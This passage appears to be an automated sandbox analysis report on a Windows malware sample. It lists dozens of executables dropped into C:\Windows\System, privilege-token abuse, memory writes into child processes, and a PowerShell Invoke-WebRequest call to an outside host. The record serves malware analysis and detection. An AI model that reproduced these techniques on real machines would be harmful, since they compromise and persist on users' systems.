File created	C:\Windows\System\NnGVRen.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\kkYvinf.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\MaDGKzO.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\OFvtrWL.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\CdlhZKn.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\Gxxgikp.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\ikuIsim.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\xowsAqm.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\FwQWinm.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SgNAiKg.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\vGUsriA.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\ZIuKsNo.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\ZfifEYl.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\fcFEixv.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\ybDyGyh.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\YaTYsBN.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\SMxFVIf.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\PuHhQGA.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\EdjJDeZ.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\XQcQiJt.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\rYNTYqS.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\XFLXmLw.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\wJsYVFQ.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\WMZbkyB.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\YCGocZP.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\yDMyZMp.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\HrFoWfu.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
File created	C:\Windows\System\KPhjslf.exe	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeLockMemoryPrivilege	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1624 wrote to memory of 3584	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	81
PID 1624 wrote to memory of 3584	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	81
PID 1624 wrote to memory of 1136	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	82
PID 1624 wrote to memory of 1136	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	82
PID 1624 wrote to memory of 1860	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	83
PID 1624 wrote to memory of 1860	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	83
PID 1624 wrote to memory of 4056	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	84
PID 1624 wrote to memory of 4056	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	84
PID 1624 wrote to memory of 1512	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	85
PID 1624 wrote to memory of 1512	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	85
PID 1624 wrote to memory of 3404	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	86
PID 1624 wrote to memory of 3404	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	86
PID 1624 wrote to memory of 4472	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	87
PID 1624 wrote to memory of 4472	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	87
PID 1624 wrote to memory of 2936	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	88
PID 1624 wrote to memory of 2936	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	88
PID 1624 wrote to memory of 4232	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	89
PID 1624 wrote to memory of 4232	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	89
PID 1624 wrote to memory of 2500	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	90
PID 1624 wrote to memory of 2500	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	90
PID 1624 wrote to memory of 3380	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	91
PID 1624 wrote to memory of 3380	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	91
PID 1624 wrote to memory of 4892	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	92
PID 1624 wrote to memory of 4892	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	92
PID 1624 wrote to memory of 1964	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	93
PID 1624 wrote to memory of 1964	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	93
PID 1624 wrote to memory of 3628	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	94
PID 1624 wrote to memory of 3628	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	94
PID 1624 wrote to memory of 4532	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	95
PID 1624 wrote to memory of 4532	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	95
PID 1624 wrote to memory of 2228	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	96
PID 1624 wrote to memory of 2228	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	96
PID 1624 wrote to memory of 3028	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	97
PID 1624 wrote to memory of 3028	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	97
PID 1624 wrote to memory of 1960	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	98
PID 1624 wrote to memory of 1960	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	98
PID 1624 wrote to memory of 2108	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	99
PID 1624 wrote to memory of 2108	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	99
PID 1624 wrote to memory of 1248	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	100
PID 1624 wrote to memory of 1248	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	100
PID 1624 wrote to memory of 4252	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	101
PID 1624 wrote to memory of 4252	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	101
PID 1624 wrote to memory of 1840	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	102
PID 1624 wrote to memory of 1840	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	102
PID 1624 wrote to memory of 1876	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	103
PID 1624 wrote to memory of 1876	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	103
PID 1624 wrote to memory of 3088	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	104
PID 1624 wrote to memory of 3088	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	104
PID 1624 wrote to memory of 3624	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	105
PID 1624 wrote to memory of 3624	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	105
PID 1624 wrote to memory of 1656	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	106
PID 1624 wrote to memory of 1656	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	106
PID 1624 wrote to memory of 1280	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	107
PID 1624 wrote to memory of 1280	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	107
PID 1624 wrote to memory of 5048	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	108
PID 1624 wrote to memory of 5048	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	108
PID 1624 wrote to memory of 1740	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	109
PID 1624 wrote to memory of 1740	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	109
PID 1624 wrote to memory of 2432	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	110
PID 1624 wrote to memory of 2432	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	110
PID 1624 wrote to memory of 2412	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	111
PID 1624 wrote to memory of 2412	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	111
PID 1624 wrote to memory of 1252	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	112
PID 1624 wrote to memory of 1252	1624	2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe	112

C:\Users\Admin\AppData\Local\Temp\2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe
"C:\Users\Admin\AppData\Local\Temp\2fc936721a4f002982bfe57e521f038f46410ddd968d322d835062f810939c74.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3584
- C:\Windows\System\mPipOEn.exe
  C:\Windows\System\mPipOEn.exe
  2⤵
  - Executes dropped EXE
  PID:1136
- C:\Windows\System\gEIZzEK.exe
  C:\Windows\System\gEIZzEK.exe
  2⤵
  - Executes dropped EXE
  PID:1860
- C:\Windows\System\fjGKxEN.exe
  C:\Windows\System\fjGKxEN.exe
  2⤵
  - Executes dropped EXE
  PID:4056
- C:\Windows\System\CaXmbcR.exe
  C:\Windows\System\CaXmbcR.exe
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\Windows\System\YjTqmci.exe
  C:\Windows\System\YjTqmci.exe
  2⤵
  - Executes dropped EXE
  PID:3404
- C:\Windows\System\ZtEKeJs.exe
  C:\Windows\System\ZtEKeJs.exe
  2⤵
  - Executes dropped EXE
  PID:4472
- C:\Windows\System\llZiQdb.exe
  C:\Windows\System\llZiQdb.exe
  2⤵
  - Executes dropped EXE
  PID:2936
- C:\Windows\System\BNCeRRD.exe
  C:\Windows\System\BNCeRRD.exe
  2⤵
  - Executes dropped EXE
  PID:4232
- C:\Windows\System\GHjVyZk.exe
  C:\Windows\System\GHjVyZk.exe
  2⤵
  - Executes dropped EXE
  PID:2500
- C:\Windows\System\WWYgyLJ.exe
  C:\Windows\System\WWYgyLJ.exe
  2⤵
  - Executes dropped EXE
  PID:3380
- C:\Windows\System\umHhpZH.exe
  C:\Windows\System\umHhpZH.exe
  2⤵
  - Executes dropped EXE
  PID:4892
- C:\Windows\System\XCxjzWF.exe
  C:\Windows\System\XCxjzWF.exe
  2⤵
  - Executes dropped EXE
  PID:1964
- C:\Windows\System\SbarBUP.exe
  C:\Windows\System\SbarBUP.exe
  2⤵
  - Executes dropped EXE
  PID:3628
- C:\Windows\System\xXQcoRn.exe
  C:\Windows\System\xXQcoRn.exe
  2⤵
  - Executes dropped EXE
  PID:4532
- C:\Windows\System\dKSbVgA.exe
  C:\Windows\System\dKSbVgA.exe
  2⤵
  - Executes dropped EXE
  PID:2228
- C:\Windows\System\dbprcMB.exe
  C:\Windows\System\dbprcMB.exe
  2⤵
  - Executes dropped EXE
  PID:3028
- C:\Windows\System\CTpLeaJ.exe
  C:\Windows\System\CTpLeaJ.exe
  2⤵
  - Executes dropped EXE
  PID:1960
- C:\Windows\System\CehghiH.exe
  C:\Windows\System\CehghiH.exe
  2⤵
  - Executes dropped EXE
  PID:2108
- C:\Windows\System\wAAWPxu.exe
  C:\Windows\System\wAAWPxu.exe
  2⤵
  - Executes dropped EXE
  PID:1248
- C:\Windows\System\ZJyMaKm.exe
  C:\Windows\System\ZJyMaKm.exe
  2⤵
  - Executes dropped EXE
  PID:4252
- C:\Windows\System\SnjNxZK.exe
  C:\Windows\System\SnjNxZK.exe
  2⤵
  - Executes dropped EXE
  PID:1840
- C:\Windows\System\EqqkvDc.exe
  C:\Windows\System\EqqkvDc.exe
  2⤵
  - Executes dropped EXE
  PID:1876
- C:\Windows\System\RTcxBOT.exe
  C:\Windows\System\RTcxBOT.exe
  2⤵
  - Executes dropped EXE
  PID:3088
- C:\Windows\System\zvEWRgk.exe
  C:\Windows\System\zvEWRgk.exe
  2⤵
  - Executes dropped EXE
  PID:3624
- C:\Windows\System\VvQJWcr.exe
  C:\Windows\System\VvQJWcr.exe
  2⤵
  - Executes dropped EXE
  PID:1656
- C:\Windows\System\HabaOsT.exe
  C:\Windows\System\HabaOsT.exe
  2⤵
  - Executes dropped EXE
  PID:1280
- C:\Windows\System\FguqZzv.exe
  C:\Windows\System\FguqZzv.exe
  2⤵
  - Executes dropped EXE
  PID:5048
- C:\Windows\System\paHiYGT.exe
  C:\Windows\System\paHiYGT.exe
  2⤵
  - Executes dropped EXE
  PID:1740
- C:\Windows\System\PbrCCEq.exe
  C:\Windows\System\PbrCCEq.exe
  2⤵
  - Executes dropped EXE
  PID:2432
- C:\Windows\System\IzDOqIg.exe
  C:\Windows\System\IzDOqIg.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\System\BAqTjYg.exe
  C:\Windows\System\BAqTjYg.exe
  2⤵
  - Executes dropped EXE
  PID:1252
- C:\Windows\System\xWQfmRC.exe
  C:\Windows\System\xWQfmRC.exe
  2⤵
  - Executes dropped EXE
  PID:3436
- C:\Windows\System\WlJLSmI.exe
  C:\Windows\System\WlJLSmI.exe
  2⤵
  - Executes dropped EXE
  PID:4752
- C:\Windows\System\sckqFGQ.exe
  C:\Windows\System\sckqFGQ.exe
  2⤵
  - Executes dropped EXE
  PID:5060
- C:\Windows\System\VryqGLZ.exe
  C:\Windows\System\VryqGLZ.exe
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Windows\System\psoYkCP.exe
  C:\Windows\System\psoYkCP.exe
  2⤵
  - Executes dropped EXE
  PID:3440
- C:\Windows\System\CHXRWEk.exe
  C:\Windows\System\CHXRWEk.exe
  2⤵
  - Executes dropped EXE
  PID:2392
- C:\Windows\System\vGUsriA.exe
  C:\Windows\System\vGUsriA.exe
  2⤵
  - Executes dropped EXE
  PID:3520
- C:\Windows\System\SGeRiSx.exe
  C:\Windows\System\SGeRiSx.exe
  2⤵
  - Executes dropped EXE
  PID:924
- C:\Windows\System\mnVKtom.exe
  C:\Windows\System\mnVKtom.exe
  2⤵
  - Executes dropped EXE
  PID:3832
- C:\Windows\System\weYnmTl.exe
  C:\Windows\System\weYnmTl.exe
  2⤵
  - Executes dropped EXE
  PID:5032
- C:\Windows\System\YCcgLVL.exe
  C:\Windows\System\YCcgLVL.exe
  2⤵
  - Executes dropped EXE
  PID:4556
- C:\Windows\System\nsVVtGy.exe
  C:\Windows\System\nsVVtGy.exe
  2⤵
  - Executes dropped EXE
  PID:3096
- C:\Windows\System\TGKcrOj.exe
  C:\Windows\System\TGKcrOj.exe
  2⤵
  - Executes dropped EXE
  PID:3528
- C:\Windows\System\eRyOSfz.exe
  C:\Windows\System\eRyOSfz.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Windows\System\PmkTboP.exe
  C:\Windows\System\PmkTboP.exe
  2⤵
  - Executes dropped EXE
  PID:4240
- C:\Windows\System\ZuObhrE.exe
  C:\Windows\System\ZuObhrE.exe
  2⤵
  - Executes dropped EXE
  PID:1996
- C:\Windows\System\XQrSUvZ.exe
  C:\Windows\System\XQrSUvZ.exe
  2⤵
  - Executes dropped EXE
  PID:1768
- C:\Windows\System\IqiFUnI.exe
  C:\Windows\System\IqiFUnI.exe
  2⤵
  - Executes dropped EXE
  PID:2416
- C:\Windows\System\vtQklxl.exe
  C:\Windows\System\vtQklxl.exe
  2⤵
  - Executes dropped EXE
  PID:4628
- C:\Windows\System\lRvriWz.exe
  C:\Windows\System\lRvriWz.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- C:\Windows\System\nkqjeNE.exe
  C:\Windows\System\nkqjeNE.exe
  2⤵
  - Executes dropped EXE
  PID:1440
- C:\Windows\System\FDRtFMv.exe
  C:\Windows\System\FDRtFMv.exe
  2⤵
  - Executes dropped EXE
  PID:1352
- C:\Windows\System\ZQzWhwu.exe
  C:\Windows\System\ZQzWhwu.exe
  2⤵
  - Executes dropped EXE
  PID:3460
- C:\Windows\System\FvrtmoY.exe
  C:\Windows\System\FvrtmoY.exe
  2⤵
  - Executes dropped EXE
  PID:3360
- C:\Windows\System\xRBluBr.exe
  C:\Windows\System\xRBluBr.exe
  2⤵
  - Executes dropped EXE
  PID:2364
- C:\Windows\System\DLaKVxJ.exe
  C:\Windows\System\DLaKVxJ.exe
  2⤵
  - Executes dropped EXE
  PID:4452
- C:\Windows\System\tZFmThF.exe
  C:\Windows\System\tZFmThF.exe
  2⤵
  - Executes dropped EXE
  PID:4536
- C:\Windows\System\jiemoPp.exe
  C:\Windows\System\jiemoPp.exe
  2⤵
  - Executes dropped EXE
  PID:4620
- C:\Windows\System\XzhDYBW.exe
  C:\Windows\System\XzhDYBW.exe
  2⤵
  - Executes dropped EXE
  PID:1620
- C:\Windows\System\sDnQUxi.exe
  C:\Windows\System\sDnQUxi.exe
  2⤵
  - Executes dropped EXE
  PID:1648
- C:\Windows\System\dyabLVi.exe
  C:\Windows\System\dyabLVi.exe
  2⤵
  - Executes dropped EXE
  PID:3972
- C:\Windows\System\kxIGAyq.exe
  C:\Windows\System\kxIGAyq.exe
  2⤵
  - Executes dropped EXE
  PID:752
- C:\Windows\System\HMIITvx.exe
  C:\Windows\System\HMIITvx.exe
  2⤵
  - Executes dropped EXE
  PID:3256
- C:\Windows\System\EOZqDvj.exe
  C:\Windows\System\EOZqDvj.exe
  2⤵
  PID:3116
- C:\Windows\System\YHqsHLv.exe
  C:\Windows\System\YHqsHLv.exe
  2⤵
  PID:1560
- C:\Windows\System\HOcXiNq.exe
  C:\Windows\System\HOcXiNq.exe
  2⤵
  PID:2456
- C:\Windows\System\BEKKdIZ.exe
  C:\Windows\System\BEKKdIZ.exe
  2⤵
  PID:2700
- C:\Windows\System\qJYXnnF.exe
  C:\Windows\System\qJYXnnF.exe
  2⤵
  PID:3136
- C:\Windows\System\HafefbG.exe
  C:\Windows\System\HafefbG.exe
  2⤵
  PID:2324
- C:\Windows\System\ARZqodA.exe
  C:\Windows\System\ARZqodA.exe
  2⤵
  PID:4420
- C:\Windows\System\BnskiZN.exe
  C:\Windows\System\BnskiZN.exe
  2⤵
  PID:4132
- C:\Windows\System\YdmeOBB.exe
  C:\Windows\System\YdmeOBB.exe
  2⤵
  PID:1060
- C:\Windows\System\gKUqUBM.exe
  C:\Windows\System\gKUqUBM.exe
  2⤵
  PID:4012
- C:\Windows\System\HIGQPCG.exe
  C:\Windows\System\HIGQPCG.exe
  2⤵
  PID:1420
- C:\Windows\System\cDnkrYa.exe
  C:\Windows\System\cDnkrYa.exe
  2⤵
  PID:3748
- C:\Windows\System\FSqNGOX.exe
  C:\Windows\System\FSqNGOX.exe
  2⤵
  PID:3952
- C:\Windows\System\YOiWLHp.exe
  C:\Windows\System\YOiWLHp.exe
  2⤵
  PID:2468
- C:\Windows\System\ZzUMbvg.exe
  C:\Windows\System\ZzUMbvg.exe
  2⤵
  PID:4324
- C:\Windows\System\BiJwJDr.exe
  C:\Windows\System\BiJwJDr.exe
  2⤵
  PID:1984
- C:\Windows\System\fyutAxI.exe
  C:\Windows\System\fyutAxI.exe
  2⤵
  PID:2452
- C:\Windows\System\bqzbhWS.exe
  C:\Windows\System\bqzbhWS.exe
  2⤵
  PID:2316
- C:\Windows\System\nSnvJtf.exe
  C:\Windows\System\nSnvJtf.exe
  2⤵
  PID:1404
- C:\Windows\System\RksnLgo.exe
  C:\Windows\System\RksnLgo.exe
  2⤵
  PID:3988
- C:\Windows\System\YMyrBPe.exe
  C:\Windows\System\YMyrBPe.exe
  2⤵
  PID:3620
- C:\Windows\System\hbWthBN.exe
  C:\Windows\System\hbWthBN.exe
  2⤵
  PID:1276
- C:\Windows\System\gEKnsDI.exe
  C:\Windows\System\gEKnsDI.exe
  2⤵
  PID:4800
- C:\Windows\System\MBVdCRk.exe
  C:\Windows\System\MBVdCRk.exe
  2⤵
  PID:3476
- C:\Windows\System\WpOrcBd.exe
  C:\Windows\System\WpOrcBd.exe
  2⤵
  PID:512
- C:\Windows\System\nHMOdsC.exe
  C:\Windows\System\nHMOdsC.exe
  2⤵
  PID:4224
- C:\Windows\System\RzJfrHN.exe
  C:\Windows\System\RzJfrHN.exe
  2⤵
  PID:2296
- C:\Windows\System\PQsJCNx.exe
  C:\Windows\System\PQsJCNx.exe
  2⤵
  PID:4760
- C:\Windows\System\rxTQzAd.exe
  C:\Windows\System\rxTQzAd.exe
  2⤵
  PID:2168
- C:\Windows\System\jXAOrvq.exe
  C:\Windows\System\jXAOrvq.exe
  2⤵
  PID:2536
- C:\Windows\System\UZVVGvv.exe
  C:\Windows\System\UZVVGvv.exe
  2⤵
  PID:884
- C:\Windows\System\twfMeoZ.exe
  C:\Windows\System\twfMeoZ.exe
  2⤵
  PID:4508
- C:\Windows\System\EBRYEPh.exe
  C:\Windows\System\EBRYEPh.exe
  2⤵
  PID:2912
- C:\Windows\System\kdbpkon.exe
  C:\Windows\System\kdbpkon.exe
  2⤵
  PID:3776
- C:\Windows\System\BVYAAHo.exe
  C:\Windows\System\BVYAAHo.exe
  2⤵
  PID:388
- C:\Windows\System\fGLsHkZ.exe
  C:\Windows\System\fGLsHkZ.exe
  2⤵
  PID:4088
- C:\Windows\System\qJClzhj.exe
  C:\Windows\System\qJClzhj.exe
  2⤵
  PID:3600
- C:\Windows\System\YZHXdnP.exe
  C:\Windows\System\YZHXdnP.exe
  2⤵
  PID:1976
- C:\Windows\System\rmnHyGh.exe
  C:\Windows\System\rmnHyGh.exe
  2⤵
  PID:2692
- C:\Windows\System\bIXhAUe.exe
  C:\Windows\System\bIXhAUe.exe
  2⤵
  PID:1376
- C:\Windows\System\TrhhkrR.exe
  C:\Windows\System\TrhhkrR.exe
  2⤵
  PID:4780
- C:\Windows\System\IqjNZhD.exe
  C:\Windows\System\IqjNZhD.exe
  2⤵
  PID:3324
- C:\Windows\System\biryKNW.exe
  C:\Windows\System\biryKNW.exe
  2⤵
  PID:5136
- C:\Windows\System\KHjvZhn.exe
  C:\Windows\System\KHjvZhn.exe
  2⤵
  PID:5172
- C:\Windows\System\BysEhpR.exe
  C:\Windows\System\BysEhpR.exe
  2⤵
  PID:5200
- C:\Windows\System\UldGgOY.exe
  C:\Windows\System\UldGgOY.exe
  2⤵
  PID:5220
- C:\Windows\System\loIPbgZ.exe
  C:\Windows\System\loIPbgZ.exe
  2⤵
  PID:5256
- C:\Windows\System\hXOKxYX.exe
  C:\Windows\System\hXOKxYX.exe
  2⤵
  PID:5284
- C:\Windows\System\BOzHPMh.exe
  C:\Windows\System\BOzHPMh.exe
  2⤵
  PID:5300
- C:\Windows\System\EXbpvdy.exe
  C:\Windows\System\EXbpvdy.exe
  2⤵
  PID:5348
- C:\Windows\System\IVoZRRO.exe
  C:\Windows\System\IVoZRRO.exe
  2⤵
  PID:5368
- C:\Windows\System\axcurpj.exe
  C:\Windows\System\axcurpj.exe
  2⤵
  PID:5396
- C:\Windows\System\FELWoUP.exe
  C:\Windows\System\FELWoUP.exe
  2⤵
  PID:5428
- C:\Windows\System\EOsSUkJ.exe
  C:\Windows\System\EOsSUkJ.exe
  2⤵
  PID:5452
- C:\Windows\System\WUylvSs.exe
  C:\Windows\System\WUylvSs.exe
  2⤵
  PID:5468
- C:\Windows\System\vdXGBxm.exe
  C:\Windows\System\vdXGBxm.exe
  2⤵
  PID:5516
- C:\Windows\System\itpqaOm.exe
  C:\Windows\System\itpqaOm.exe
  2⤵
  PID:5540
- C:\Windows\System\gCEZVeg.exe
  C:\Windows\System\gCEZVeg.exe
  2⤵
  PID:5560
- C:\Windows\System\pZAOmjz.exe
  C:\Windows\System\pZAOmjz.exe
  2⤵
  PID:5596
- C:\Windows\System\ZNosNhb.exe
  C:\Windows\System\ZNosNhb.exe
  2⤵
  PID:5624
- C:\Windows\System\ERwDaIK.exe
  C:\Windows\System\ERwDaIK.exe
  2⤵
  PID:5644
- C:\Windows\System\ChhkOMY.exe
  C:\Windows\System\ChhkOMY.exe
  2⤵
  PID:5676
- C:\Windows\System\GLyETnX.exe
  C:\Windows\System\GLyETnX.exe
  2⤵
  PID:5716
- C:\Windows\System\eOqgyHl.exe
  C:\Windows\System\eOqgyHl.exe
  2⤵
  PID:5740
- C:\Windows\System\ibMTSvB.exe
  C:\Windows\System\ibMTSvB.exe
  2⤵
  PID:5756
- C:\Windows\System\EunEXtY.exe
  C:\Windows\System\EunEXtY.exe
  2⤵
  PID:5772
- C:\Windows\System\EfoChZL.exe
  C:\Windows\System\EfoChZL.exe
  2⤵
  PID:5812
- C:\Windows\System\jMBmQsH.exe
  C:\Windows\System\jMBmQsH.exe
  2⤵
  PID:5848
- C:\Windows\System\dzCaoVA.exe
  C:\Windows\System\dzCaoVA.exe
  2⤵
  PID:5880
- C:\Windows\System\rybBmOS.exe
  C:\Windows\System\rybBmOS.exe
  2⤵
  PID:5908
- C:\Windows\System\HAZuatr.exe
  C:\Windows\System\HAZuatr.exe
  2⤵
  PID:5936
- C:\Windows\System\iGborsH.exe
  C:\Windows\System\iGborsH.exe
  2⤵
  PID:5980
- C:\Windows\System\NBWWDdJ.exe
  C:\Windows\System\NBWWDdJ.exe
  2⤵
  PID:6000
- C:\Windows\System\vuCdamY.exe
  C:\Windows\System\vuCdamY.exe
  2⤵
  PID:6040
- C:\Windows\System\CKSEHnp.exe
  C:\Windows\System\CKSEHnp.exe
  2⤵
  PID:6084
- C:\Windows\System\MsuxzDF.exe
  C:\Windows\System\MsuxzDF.exe
  2⤵
  PID:6132
- C:\Windows\System\tNNzOsX.exe
  C:\Windows\System\tNNzOsX.exe
  2⤵
  PID:5132
- C:\Windows\System\jjJHXqO.exe
  C:\Windows\System\jjJHXqO.exe
  2⤵
  PID:5180
- C:\Windows\System\NuatJHn.exe
  C:\Windows\System\NuatJHn.exe
  2⤵
  PID:5216
- C:\Windows\System\mVXSNNO.exe
  C:\Windows\System\mVXSNNO.exe
  2⤵
  PID:5312
- C:\Windows\System\LHuekNu.exe
  C:\Windows\System\LHuekNu.exe
  2⤵
  PID:316
- C:\Windows\System\chvpRZx.exe
  C:\Windows\System\chvpRZx.exe
  2⤵
  PID:5380
- C:\Windows\System\DwINTHU.exe
